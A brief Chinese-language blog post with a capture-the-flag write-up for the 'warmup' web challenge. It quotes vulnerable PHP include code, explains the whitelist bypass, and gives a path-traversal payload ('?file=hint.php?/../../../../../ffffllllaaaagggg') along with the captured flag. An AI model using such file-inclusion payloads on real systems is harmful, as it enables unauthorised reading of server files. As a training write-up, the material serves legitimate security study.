warmup

warmup

查看网页源代码发现有个source.php

下面我们注意到一个file参数

if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  

做过文件包含漏洞练习的小伙伴此刻就应该敏感了,这里面写了一个include函数,可以通过file来传递页面

同时上面提示了一个hint.php,进去发现这么一段话:flag not here, and flag in ffffllllaaaagggg

?file=hint.php?/../../../../../ffffllllaaaagggg

flag:flag{25e7bce6005c4e0c983fb97297ac6e5a}

posted @ 2020-11-05 00:50  nihinumbra  阅读(166)  评论(0编辑  收藏  举报